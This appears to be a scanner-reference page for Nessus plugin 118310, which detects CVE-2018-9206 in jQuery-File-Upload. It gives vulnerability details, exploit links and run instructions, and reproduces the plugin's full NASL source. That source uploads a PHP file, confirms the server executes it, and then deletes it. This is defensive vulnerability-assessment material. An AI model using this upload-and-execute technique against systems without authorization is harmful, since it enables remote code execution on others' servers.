jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) - Nessus
Critical Plugin ID: 118310This page contains detailed information about the jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 118310
Name: jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check)
Filename: jquery_fileupload_rce.nasl
Vulnerability Published: 2018-10-11
This Plugin Published: 2018-10-22
Last Modification Time: 2022-04-11
Plugin Version: 1.15
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
http_version.nasl, webmirror3.nbin
Required KB Items [?]: www/PHP
Excluded KB Items: Settings/disable_cgi_scanning
Vulnerability Information
Severity: Critical
Vulnerability Published: 2018-10-11
Patch Published: 2018-10-11
CVE [?]: CVE-2018-9206
CPE [?]: x-cpe:/a:jquery-file-upload:jquery-file-upload
In the News: True
Synopsis
The remote web server contains a PHP application that is affected by a file upload vulnerability allowing remote code execution.
Description
The version of jQuery-File-Upload running on the remote host is affected by an arbitrary file upload vulnerability. An unauthenticated attacker could leverage this vulnerability to gain access to the host in the context of the web application user.
Solution
Upgrade to blueimp/jQuery-File-Upload version 9.22.1 or later. Additionally if using a branch of this project, contact the branch maintainer for a product security update.
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Immunity Canvas, D2 Elliot)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) vulnerability:
- Metasploit: exploit/unix/webapp/jquery_file_upload
[blueimps jQuery (Arbitrary) File Upload] - Metasploit: exploit/unix/webapp/jquery_file_upload
[blueimp's jQuery (Arbitrary) File Upload] - Exploit-DB: exploits/php/remote/45790.rb
[EDB-45790: blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)] - Exploit-DB: exploits/php/webapps/45584.txt
[EDB-45584: jQuery-File-Upload 9.22.0 - Arbitrary File Upload] - Exploit-DB: exploits/php/webapps/46182.py
[EDB-46182: Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit] - GitHub: https://github.com/Apri1y/Red-Team-links
[CVE-2018-9206] - GitHub: https://github.com/Echocipher/Resource-list
[CVE-2018-9206] - GitHub: https://github.com/HacTF/poc--exp
[CVE-2018-9206] - GitHub: https://github.com/hudunkey/Red-Team-links
[CVE-2018-9206] - GitHub: https://github.com/john-80/-007
[CVE-2018-9206] - GitHub: https://github.com/lp008/Hack-readme
[CVE-2018-9206] - GitHub: https://github.com/slimdaddy/RedTeam
[CVE-2018-9206] - GitHub: https://github.com/wateroot/poc-exp
[CVE-2018-9206] - GitHub: https://github.com/xiaoZ-hc/redtool
[CVE-2018-9206] - GitHub: http://www.vapidlabs.com/advisory.php?v=204
[CVE-2018-9206] - GitHub: https://github.com/cved-sources/cve-2018-9206
[CVE-2018-9206: Cve-2018-9206] - GitHub: https://github.com/Den1al/CVE-2018-9206
[CVE-2018-9206: A Python PoC for CVE-2018-9206] - GitHub: https://github.com/mi-hood/CVE-2018-9206
[CVE-2018-9206: Jquery file upload poc] - GitHub: https://github.com/Stahlz/JQShell
[CVE-2018-9206: A weaponized version of CVE-2018-9206] - D2 Elliot: jquery_file_upload.html
[jQuery File Upload] - Immunity Canvas: CANVAS
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS Score Source [?]: CVE-2018-9206
CVSS V2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:OF/RC:C
| CVSS Base Score: | 7.5 (High) |
| Impact Subscore: | 6.4 |
| Exploitability Subscore: | 10.0 |
| CVSS Temporal Score: | 6.2 (Medium) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 6.2 (Medium) |
| CVSS Base Score: | 9.8 (Critical) |
| Impact Subscore: | 5.9 |
| Exploitability Subscore: | 3.9 |
| CVSS Temporal Score: | 9.1 (Critical) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 9.1 (Critical) |
Go back to menu.
Plugin Source
This is the jquery_fileupload_rce.nasl nessus plugin source code. This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(118310);
script_version("1.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2018-9206");
script_name(english:"jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check)");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
a file upload vulnerability allowing remote code execution.");
script_set_attribute(attribute:"description", value:
"The version of jQuery-File-Upload running on the remote host is
affected by an arbitrary file upload vulnerability. An unauthenticated
attacker could leverage this vulnerability to gain access to the host
in the context of the web application user.");
script_set_attribute(attribute:"see_also", value:"https://github.com/blueimp/jQuery-File-Upload/");
script_set_attribute(attribute:"see_also", value:"http://www.vapidlabs.com/advisory.php?v=204");
script_set_attribute(attribute:"see_also", value:"https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206");
# https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?096ac7c1");
script_set_attribute(attribute:"solution", value:
"Upgrade to blueimp/jQuery-File-Upload version 9.22.1 or later.
Additionally if using a branch of this project, contact the branch
maintainer for a product security update.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9206");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"jQuery File Upload");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'blueimps jQuery (Arbitrary) File Upload');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"CANVAS");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2018/10/11");
script_set_attribute(attribute:"patch_publication_date", value:"2018/10/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/10/22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"x-cpe:/a:jquery-file-upload:jquery-file-upload");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("webmirror3.nbin", "http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("json.inc");
port = get_http_port(default:80, php:TRUE);
urls =
{
"server/php/upload.class.php": "server/php/index.php",
"jQuery-File-Upload/server/php/upload.class.php": "/jQuery-File-Upload/server/php/index.php",
"example/upload.php": "example/upload.php",
"jQuery-File-Upload/example/upload.php": "jQuery-File-Upload/example/upload.php",
"server/php/UploadHandler.php": "server/php/index.php",
"jQuery-File-Upload/server/php/UploadHandler.php": "jQuery-File-Upload/server/php/index.php",
"php/index.php": "php/index.php",
"jQuery-File-Upload/php/index.php": "jQuery-File-Upload/php/index.php"
};
function http_del(url)
{
res = http_send_recv3(
method : "DELETE",
port : port,
item : url
);
if (res && res[2])
return [http_last_sent_request(), res[2]];
}
vuln = FALSE;
found = FALSE;
filename = "jqueryfileupload-" + rand_str(length:8) + ".php";
bound = rand_str(length:16, charset:"0123456789abcdef");
boundary = "--" + bound;
postdata =
boundary + '\r\n' +
'content-disposition: form-data; name="files"; filename="' + filename + '"\r\n' +
'content-type: text/plain\r\n' +
'\r\n' +
'<?php echo "<html>' + substr(SCRIPT_NAME, 0, strlen(SCRIPT_NAME) - 2) + '"; echo "' + substr(SCRIPT_NAME, strlen(SCRIPT_NAME) - 1) + '</html>" ?>\r\n' +
boundary + '--\r\n';
if (thorough_tests)
{
curr_dir = get_kb_item_or_exit("www/" + port + "/content/directory_index");
}
else
{
curr_dir = "/";
}
foreach url (keys(urls))
{
# Check for the vulnerable script or required library
res = http_send_recv3(
method : "HEAD",
port : port,
item : build_url(port:port, qs:curr_dir + url),
exit_on_fail : TRUE
);
if ("200 OK" >< res[0])
{
# upload the php file
res = http_send_recv3(
method : "POST",
port : port,
item : build_url(port:port, qs:curr_dir + urls[url]),
add_headers : {"Content-Type": "multipart/form-data; boundary=" + bound},
data : postdata,
exit_on_fail : TRUE
);
if (res && res[2])
{
post_req = http_last_sent_request();
post_res = res[2];
json = json_read(res[2]);
}
else
{
audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
}
if (typeof(json) == "array" && json[0]['files'][0]['name'] && json[0]['files'][0]['url'] && json[0]['files'][0]['deleteUrl'])
{
filename2 = json[0]['files'][0]['name'];
shellurl = json[0]['files'][0]['url'];
delurl = json[0]['files'][0]['deleteUrl'];
}
else if (typeof(json) == "array" && json[0]['0']['name'] && json[0]['0']['url'] && json[0]['0']['delete_url'])
{
filename2 = json[0]['0']['name'];
shellurl = json[0]['0']['url'];
delurl = json[0]['0']['delete_url'];
}
else if (typeof(json) == "array" && json[0]['name'] && json[0]['url'] && json[0]['delete_url'])
{
filename2 = json[0]['name'];
shellurl = json[0]['url'];
delurl = json[0]['delete_url'];
}
else if (typeof(json) == "array" && (json[0]['error'] || json[0]['0']['error'] || json[0]['files'][0]['error']))
# correctly working script
audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
else
{
# Not sure what came back. try to do a delete if we got a 200 in case it worked anyway
if ("200 OK" >< res[0])
http_del(url:build_url(port:port, qs:curr_dir + urls[url]) + '?file=' + filename);
audit(AUDIT_RESP_BAD, port, "POST " + curr_dir +urls[url]);
}
if (filename2 && shellurl && delurl)
{
# Did htaccess rewrite it?
if (filename != filename2 && !pregmatch(pattern:".php$", string:filename2))
{
http_del(url:delurl);
audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
}
vuln = TRUE;
}
found = TRUE;
break;
}
}
if (found && !vuln)
audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
if (!found)
audit(AUDIT_WEB_APP_NOT_INST, "jQuery-File-Upload", port);
# test the file
res = http_send_recv3(
method : "GET",
port : port,
item : shellurl
);
# this is a test to see if PHP is executing our upload
if (res && res[2] && SCRIPT_NAME >< res[2])
{
shell_req = http_last_sent_request();
shell_res = res[2];
}
# delete the file
out = http_del(url:delurl);
if (out)
{
del_res = out[1];
del_req = out[0];
}
if (vuln)
{
# build request and output:
request = [];
output = [];
if (post_req)
{
request = make_list(request, '>>>>>\n' + post_req + '<<<<<\n' + post_res);
}
if (shell_req)
{
request = make_list(request, '>>>>>\n' + shell_req + '<<<<<\n' + shell_res);
}
if (del_req)
{
request = make_list(request, '>>>>>\n' + del_req + '<<<<<\n' + del_res);
}
security_report_v4(
port : port,
severity : SECURITY_HOLE,
line_limit : 20,
request : request,
generic : TRUE
);
}
exit(0);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/jquery_fileupload_rce.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\jquery_fileupload_rce.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/jquery_fileupload_rce.nasl
Go back to menu.
How to Run
Here is how to run the jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) plugin ID 118310.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl jquery_fileupload_rce.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a jquery_fileupload_rce.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - jquery_fileupload_rce.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state jquery_fileupload_rce.nasl -t <IP/HOST>Go back to menu.
References
See also:
- https://www.tenable.com/plugins/nessus/118310
- https://github.com/blueimp/jQuery-File-Upload/
- https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206
- http://www.nessus.org/u?096ac7c1
- http://www.vapidlabs.com/advisory.php?v=204
- https://vulners.com/nessus/JQUERY_FILEUPLOAD_RCE.NASL
- 121251 - Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU)
- 124719 - JQuery < 3.4.0 Object Prototype Pollution Vulnerability
- 156443 - JQuery UI < 1.13.0 Multiple XSS
- 106656 - JQuery 1.6.x < 1.6.3 XSS
- 135011 - JQuery < 1.9.0 XSS
- 125152 - JQuery < 3.0.0 XSS
- 136929 - JQuery 1.2 < 3.5.0 Multiple XSS
- 148146 - Debian DLA-2608-1 : jquery security update
- 125483 - F5 Networks BIG-IP : jQuery vulnerability (K62532311)
- 84454 - Fedora 21 : rubygem-jquery-rails-3.1.0-3.fc21 (2015-10144)
- 84458 - Fedora 22 : rubygem-jquery-rails-3.1.0-3.fc22 (2015-10258)
- 122657 - FreeBSD : rt -- XSS via jQuery (416ca0f4-3fe0-11e9-bbdd-6805ca0b3d42)
- 128404 - FreeBSD : RDoc -- multiple jQuery vulnerabilities (ed8d5535-ca78-11e9-980b-999ff59c22ea)
- 84870 - openSUSE Security Update : rubygem-jquery-rails (openSUSE-2015-501)
- 158471 - Oracle Linux 7 : jquery-ui (ELSA-2022-9177)
- 135256 - RHEL 8 : python-XStatic-jQuery (RHSA-2020:1325)
- 144388 - RHEL 7 : python-XStatic-jQuery (RHSA-2020:5581)
- 64629 - Ubuntu 10.04 LTS / 11.10 : jquery vulnerability (USN-1722-1)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file jquery_fileupload_rce.nasl version 1.15. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
